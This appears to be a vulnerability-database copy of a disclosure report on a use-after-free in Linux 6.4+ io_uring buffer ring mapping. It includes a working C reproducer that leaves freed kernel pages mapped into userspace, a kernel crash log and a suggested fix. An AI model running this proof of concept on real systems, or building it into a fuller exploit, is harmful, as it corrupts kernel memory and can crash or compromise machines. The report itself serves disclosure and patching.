Linux 6.4 io_uring Use-After-Free

2024.01.17
Credit: Jann Horn
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Linux >=6.4: io_uring: page UAF via buffer ring mmap Since commit c56e022c0a27 (\"io_uring: add support for user mapped provided buffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate, mmap, and deallocate \"buffer rings\". A \"buffer ring\" can be allocated with io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...). It can be mapped into userspace using mmap() with offset IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM subsystem will treat the mapping as a set of opaque page frame numbers not associated with any corresponding pages; this implies that the calling code is responsible for ensuring that the mapped memory can not be freed before the userspace mapping is removed. However, there is no mechanism to ensure this in io_uring: It is possible to just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free pages mapped into userspace, which is a fairly easily exploitable situation. reproducer: ============================================================== #define _GNU_SOURCE #include <unistd.h> #include <err.h> #include <string.h> #include <stdio.h> #include <ctype.h> #include <sys/syscall.h> #include <sys/mman.h> #include <linux/io_uring.h> #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) int main(void) { struct io_uring_params params = { .flags = IORING_SETUP_NO_SQARRAY }; int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params)); printf(\"uring_fd = %d\ \", uring_fd); struct io_uring_buf_reg reg = { .ring_entries = 1, .bgid = 0, .flags = IOU_PBUF_RING_MMAP }; SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1)); void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING)); printf(\"pbuf mapped at %p\ \", pbuf_mapping); struct io_uring_buf_reg unreg = { .bgid = 0 }; SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1)); while (1) { memset(pbuf_mapping, 0xaa, 0x1000); usleep(100000); } } ============================================================== When run on a system with the debug options: CONFIG_PAGE_TABLE_CHECK=y CONFIG_PAGE_TABLE_CHECK_ENFORCED=y , this will splat with the following error, when __page_table_check_zero() detects that a page that's being freed is still mapped into userspace: ============================================================== ------------[ cut here ]------------ kernel BUG at mm/page_table_check.c:146! invalid opcode: 0000 [#1] PREEMPT SMP KASAN CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:__page_table_check_zero+0x136/0x150 Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202 RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000 RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4 RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000 R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000 FS: 00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0 PKRU: 55555554 Call Trace: <TASK> [...] free_unref_page_prepare+0x282/0x450 free_unref_page+0x45/0x170 __io_remove_buffers.part.0+0x38c/0x3c0 io_unregister_pbuf_ring+0x146/0x1e0 [...] __do_sys_io_uring_register+0xa03/0x11c0 [...] do_syscall_64+0x43/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 RIP: 0033:0x7f745ef4bf59 Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48 RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59 RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003 RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0 R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000 </TASK> Modules linked in: ---[ end trace 0000000000000000 ]--- ============================================================== When run on a system without those options, this reproducer will randomly corrupt memory and probably on most runs crash the machine. I tried it once and after I tried using some other programs, I got some random kernel #GP fault. One way to fix this might be to add some mapping counter to `struct io_buffer_list`, and then: - increment that counter in io_uring_validate_mmap_request() for PBUF_RING mappings - increment that counter in the vm_area_operations ->open() handler - decrement that counter in the vm_area_operations ->close() handler - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero? Or alternatively free the io_buffer_list when the counter drops to zero, and let the counter start at 1. (I'm not sure what the lifetime rules for other accesses to the io_buffer_list's memory are - it looks like most paths only access the io_buffer_list under some lock? Is the idea that the kernel actually accesses the buffer through userspace pointers, or something like that? I'll have to stare at this some more before I understand it...) This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-02-26. Found by: jannh@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top